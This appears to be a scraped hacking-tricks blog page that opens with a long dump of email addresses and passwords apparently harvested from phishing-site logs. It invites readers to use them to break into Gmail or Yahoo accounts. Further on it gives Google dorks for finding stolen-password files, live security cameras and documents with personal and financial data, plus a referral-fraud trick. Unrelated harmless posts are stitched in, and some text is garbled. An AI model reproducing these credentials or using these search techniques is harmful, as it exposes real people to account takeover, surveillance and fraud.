WILL GET THE USERNAME AND PASSWORDS,YOU CAN USE THIS EMAIL AND PASSWORD FOR THEIR GMAIL OR YAHOO ACCOUNT ALSO DEMO PASSWORD LIST LINK: GET IT So use this try these e mail and password to hack some get into some one account ! email=dhii.brutal pass=endclause97 email=andreansidikp2@gmail.com pass=orang ganteng email=mamicutewha@yahoo.com pass=sial la jai login=Login charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Amelia.puspitha pass=yadika11 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=02197787536afc pass=kamidari123 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=aris_pfp@yahoo.com pass=kyujae123 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Ev4n_c3wjrs@yahoo.co.id pass=nandaeva charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=a pass=a charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Cenggun126@yahoo.com pass=106829 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=nanisuryani62@Yahoo.co.id pass=naniajah charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=sitifatimahgadisgunung@yahoo.co.id pass=bidadariku charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=ryuu_sheisin18@yahoo.co.id pass=@facebook88ku charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=nindakawai@yahoo.com pass=nindajkt48 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=dertenator_jr@ymail.com pass=fuckl3ntine charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=dertenator_jr@ymail.com pass=fuckl3ntine charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=khikhay@hotmail.co.id pass=sangasu15 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=neo_canon@yahoo.com pass=89071103 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=rchl_bels@yahoo.co.id pass=sexsexsex. persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=chychollams pass=cikolam pass=aaaaa charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Uzzayherdiana@yahoo.co.id pass=333444 login=Login charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=athe_zoe@yahoo.com pass=31081993 persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=master@hackermail.com pass=imisthemaster persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=arie.manyol@yahoo.co.id pass=t4t4n9 persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=6282128628055 pass=sangiang persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=yanthree80@yahoo.com pass=12071980 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=mebe888@aol.com pass=cingcai charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=siixodox.oon pass=jancoker charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=bubu_chiko@yahoo.com pass=ayodance charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=rizkypujiandasa@yahoo.co.id pass=rahasia charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=allylopheririn@facebook.com pass=akucintadia persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=allylopheririn@facebook.com pass=akucintadia persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=severin-christopher@web.de pass=SEVOSEVOSEVO charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email= pass= charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=tyo321@facebook.com pass=.d1pl0m@thu charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=fuck@you.com pass=I will delete your account charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Ainkboedaknaragas@yahoo.com pass=b2r never die charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=ibnuabiaufa@ymail.com pass=ibnudea charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Dena.Permana98@yahoo.Co.Id pass=Anjig123 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Dena.Permana98@yahoo.Co.Id pass=Anjig123 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=a12ya.newbie@facebook.com pass=newbie charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=nanang_st22@yahoo.co.id pass=.d1pl0m@thu charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Cenggun126@yahoo.com pass=106829 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=dhika.keren27@facebook.com pass=8006012 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=dhika.keren27@facebook.com pass=8006012 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=jhajhadha@ymail.com pass=hokage charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=ama.dhesta@yahoo.co.id pass=08122691855 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=oneasshop@gmail.com pass=p4nd4w4lim4 persistent=1 sraf@yahoo.com pass=ghjgjjg charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=fitra_prabowo@rocketmail.com pass=MRg0alB3Tk1k1k charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=fuckyou@mail.com pass=oHnOyEs charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Ipankiqbal@ymail.com pass=akudankamu charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Ipankiqbal@ymail.com pass=akudankamu persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=luthfisinatrya@yahoo.com pass=krupukupil charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Rhayen_412@yahoo.co.id pass=08091994 persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=kharisma.olivia@ymail.com pass=02052011 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=mau tau aja@yahoo.co.id pass=snsn32123 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=kudus.forever@gmail.com pass=ndabbvid email=alipma39sum@yahoo.com pass=19921122 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=riftamilavao@ rocketmail.com pass=metalianrevaine charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=anhkbm1997 pass=anhakim1306997 persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=rizastreet8 pass=4123mal3n6952634187r charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=csany.aa14@gmail.com pass=indosat89 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=vhisnuscarlet@yahoo.com pass=corona_aurora persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=vhisnuscarlet@yahoo.com pass=corona_aurora charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=cadienaxreggae@rocketmail.com pass=asepferdinan charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=adialfian49@yahoo.com pass=fina23 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=adialfian49@yahoo.com pass=fina23 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=tae pass=tae charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=yusuf.leo89@yahoo.com pass=leonthe399 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=anggariantobayu@yahoo.co.id pass=134yu #@@ charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=adialfian13@yahoo.com pass=yahya123 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=yusuf.leo89@yahoo.com pass=leonthe399 persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=ulumaje pass=indonesia bisa charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=dreamknight@rocketmail.com pass=bluedream13 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=putera_ameerul@yahoo.com pass=ezio456 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=samarazein@yahoo.com pass=303399 WAS HACKED .....!!charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=jalesveva007@yahoo.co.id pass=oneseptelependt charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=septi_hartati@yahoo.co.id pass=indosat charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=jalesveva007@yahoo.co.id pass=oneseptelependt charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=nazyudin@yahoo.com pass=WELCOME!* charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Kabul.wisnu@yahoo.com pass=Wisnusuksesselalu charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=khsanadwi@gmail.com pass=hondajazzbiru charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=khsanadwi@gmail.com pass=hondajazzbiru charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Rizki_cute71@yahoo.com pass=kebumen11071994 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=yazidmadiun@yahoo.com pass=ae1486eg charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=septhouttens@ymail.com pass=lolipop123 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=princesslovekharsa@facebook.com pass=fellylovefellycious charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Radinsuryopranoto@gmail.Com pass=10loveyou persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=dra.chan49@yahoo.co.id pass=chandra31121995 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=ajaditulisyahoo.com pass=password charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=kudus.forever@gmail.com pass=ndabbvid charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=fadi_wan@yahoo.co.id pass=DUAPULUH charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=firmanputra572@yahoo.co.id pass=firmanshooterqq charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=chamdanislamholic@rocketmail.com pass=islam_4ever charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=chamdanislamholic@rocketmail.com pass=islam_4ever charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=jossevianno@yahoo.com pass=purwant0 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=chamdanislamholic@rocketmail.com pass=islam_4ever charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email= pass= charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Adinerenikrandegan@yahoo.com pass=ipulreni charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=eia_catty@yahoo.co.id pass=canxhooligan charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=Adinerenikrandegan@yahoo.com pass=ipulreni persistent=1 charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=japan_banjir@yahoo.com pass=saedtama charset_test=€,´,€,´,?,?,? version=1.0 return_session=0 session_key_only=0 lsd=QNZc2 email=gahayu.mahardhika@ymail.com pass=ghahayu1999

Access the google hacking http://www.exploit-db.com/google-dorks/

http://www.exploit-db.com/google-dorks/ Access the google hacking database to get the latest google Dork.The Google Hacking Database (GHDB) created by Johnny Long of Hackers For Charit,is the definitive source for Google search queries. Searches for usernames, passwords, vulnerable systems, and exploits have been captured and categorized by Google hacking aficionados. The aficionados who have categorized the Google searches are affectingly known as Google dorks. To access the GHDB go to this link : http://www.exploit-db.com/google-dorks/

(144) Facebook

HOW TO IDENTIFY FAKE FACEBOOK ACCOUNT...... How can you detect the Fake FB Profile. On these days we are getting so many friend request specially by girls, but there is no way to identify that account is fake or original. So don't worry we are going to tell you simple method to detect fake Facebook account. So go the account you want to check whether it is real or fake. 1.goto the images.google.com and click on camera image 2.when you click on search by image you will get popup 3. Now go to that profile, right click on image and click on copy image URL. 4. Now profile pic URL has copied.. 5. Again go to images.google.com Tab and paste image URL 6. When you enter then you get related images search...Now you can better see that this profile is real or fake. Enjoy the trick..Be aware when you will going to add an beautiful or smart unknown person as your friend. So be checked first.. there are lot of fake profiles are create everyday.This person might be spy on your profile and steal personal information like your photos, etc for their hacking stuffs..So Be Safe Online.. For any queries comment below

http://www.efytimes.com/e1/fullnews.asp?edid=136306

http://www.efytimes.com/e1/fullnews.asp?edid=136306

http://www.teamos-hkrg.com/threads/get-thousand-of-facebook-email-and-passwords-using-google-dork.3234/

http://www.teamos-hkrg.com/threads/get-thousand-of-facebook-email-and-passwords-using-google-dork.3234/

Android Trick

First on GAE Club Exclusive Android Trick To Get Unlimited Recharge : Here is A trick By which you can get a lots of recharges :- You may have listen the name of an app called mcent *First download it from here:- http://mcent.com/r/JH4PDN sign up using your number and download at least one small app to get some rs in your account *After downloading at least one app, you can get your reffral link from app *copy that link and uninstall the mcent from your phone now use that link in main browser, u will be redirected to playstore *install again and signup using your 2nd number and download at least one small app *sign out 2nd account and sign in back your first account *Hurray you got 50Rs recharge *So if you have 10 or 20 mobile numbers in home, you can get 500- 1000 Rs recharge just by using 50-60Mb Try out it, it is working Great. Download our Android App to get our updates directly on your device: https://play.google.com/store/apps/details… Rate us 5 stars and help us grow!

hack with google

1.Hacking Security Cameras! You might have noticed many security cameras monitoring places like parking lots, college campus, road traffic etc (and yes, some of them work!). Did you know you can use Google to hack into these cameras to view images captured by these cameras in real time. How do you do it? Well simply open the Google search box and type in the following query: inurl:”viewerframe?mode=motion” You will get a search result that will give you access to live cameras with full controls (move the camera in all the four directions, perform zoom in and zoom out). The above mentioned query usually gives access to cameras with less refresh rate. In case you're looking for faster refresh rates: intitle:”Live View / – AXIS” 2.Hacking Personal and Confidential Documents! You can access an email repository containing personal and confidential documents (CVs for instance) using Google. Simply open the Google search box and type in the following query: intitle:”curriculum vitae” “phone * * *” “address *” “e-mail” To access a list of excel documents which contains contact details including email addresses of people: filetype:xls inurl:”email.xls” To access documents potentially containing information on bank accounts, financial summaries and credit card numbers: intitle:index.of finances.xls 3.Gaining Access to Free Stuffs! If you're looking to download free music, simply enter the following query on Google search box and hit enter: “?intitle:index.of?mp3 artist name“ If you're looking to download free ebooks: “?intitle:index.of?pdf book name“ Source: Go Hacking

(115) Facebook

"Would you like some cheese with that WHINE?!" Criticism has the potential to be productive. Treat others the way you want to be treated - think about how you can improve first! 5 Ways to Criticize Constructively: http://www.wikihow.com/Criticize-Constructively

Thursday, October 30, 2014

Facebook Tricks

(106) Facebook

13 Facebook Tricks That You Must Know! Link : http://goo.gl/siwLPs Ever wanted to know who all deleted you on Facebook, who haven't accepted your friend request or who is online but is sitting invisible? Well, here are 13 super awesome tricks that will help you do it all! See More @ Mess with the best, Die like the rest

Incredible Google

(2) Hacking Trick - ..Incredible Google tricks 1. GO on google and...

..Incredible Google tricks 1. GO on google and type in Google Gothic and click on i m feeling lucky. 2. Go on google and type in poopgle and click i m feeling lucky read more @===>http://bit.ly/1sozI50 3. Go on google and type in Google Loco and click i m feeling lucky 4. Go on google and type in i33t and click i m feeling lucky 5. Type in ewmew fudd and click i m feeling lucky 6. Type in xx-klingon and click I m feeling lucky 7. Type in xx-piglating and click on i m feeling lucky 8. Type in google BSD and click i m feeling lucky 9. Type in Google Linux and click i m feeling lucky 10. Type in google easter egg and click i m feeling lucky 11. Type in Google Cheese and click i m feeling lucky 12. Type in Google Swedish and click i m feeling lucky! 13. Type in 2204355 and click i m feeling lucky (AND THIS ONE IS VERY RARE AND ONE OF THE BEST!) 14. Type in Google chinese and click i m feeling lucky!!! 15. Type in Google latin and click i m feeling lucky 16. Go to"www.google.com"-type in"French Military Victories"and press"I'm feeling lucky" -Look at the question"Did you mean:...". 17. Type in adress bar"http://www.google.com/Easter/feature_easter.html" -Here you can find an hidden game,offered by Google. read more @===>http://bit.ly/1sozI50

https://www.khanacademy.org/

https://www.khanacademy.org/

programming

(1) -لو حبيت أتعلم لغة برمجة بأي وحدة أبدا ؟؟ طبعاً... - قوآت الدعس الفلسطينية

If endowed with any programming language learning unit start?? Of course the question asking some of the same kthier webihatar answer wollhin the Gu is. Answer betatmd on your specialty or your passions, or learn of any objective, for example if the duck learn programming language for designing Web pages and sites, I recommend you my brother to learn the first language and the easiest and best known. HTML and then learn the CSS is. And would learn Ashan designed programmes, advise him learn giant languages. Language (C) and c++ and then learns to start designing programmes in visual bisc from microsoft.. Though the habait learn Android apps and mobile design advise you to learn the language of java script, a language difficult Shui webdha lighten the brain.. Every thing was perfect for. There are several sites to learn programming languages such as codecademy.com and advise him with his tightened, it has rolled out a professional it:) # b a pen in.

(116) Facebook

@@@ AVOID FRIEND REQUEST BLOCK ...!!! We usually send friend requests and if it's not accepted it is kept in pending. If there are lots of pending requests it may lead to block. So this is a simple way to get those requests cancelled and protect your account from being blocked. Follow below steps :- 1. Go to account settings. 2. Select `download a copy` option. 3. Choose `expanded archive` from the next page opened and enter your password and click continue. 4. Select `start my archive`. 5. After a few hours you'll get the download link in your email. 5. Download the file `facebook` and unzip it. 6. Open the folder html and then `friend_requests.htm­l`. 7. You can see the list of your friend requests and pending lists. Now goto their accounts and click`cancel request. That's all You are done now. Your account is safe. $ Subscribe to Admin Hiren Bhuva Like & Share Hacking by HIREN

Halloween inspiration

(13) wikiHow - wikiHow added a new photo.

wikiHow In need of last-minute Halloween inspiration? We've got the ultimate DIY guide for you -- with everything from Zombie Makeup tutorials to recipes for Candy Corn Jello Shots. 101 Halloween wikiHow guides http://stumble.it/wikiHowHalloweenCostumes2014

dork facebook

Hello dork

Hello,most people may heard about phishing sites,when ever victim login with their password then his login sent to http://phshingsite.com/password.text/ and you may know that http://phisingsite.com/passwords.txt isn't an password protected page and everybody can access when they go to the URL. Today i am going to tell you that how we can get lots of user passwords and their email by using google dork. So what is google dork?A google dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries. That description includes information that is not intended for public viewing but that has not been adequately protected. Here is how can you get the password STEP 1 :Go to google STEP 2: enter this dork on search :search for this : filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test=" Open your desired link use all link from first to last) this all are phishing site link where the victim password saved NOW WHEN YOU WILL CLICK ANY OF THE LINK YOU WILL GET THE USERNAME AND PASSWORDS,YOU CAN USE THIS EMAIL AND PASSWORD FOR THEIR GMAIL OR YAHOO ACCOUNT ALSO DEMO PASSWORD LIST LINK: https://www.google.co.in/url?sa=t&r...P2dv1CE_JeeytpEoLkUPcHA&bvm=bv.78597519,d.dGc

Hy

HELLO

Search Box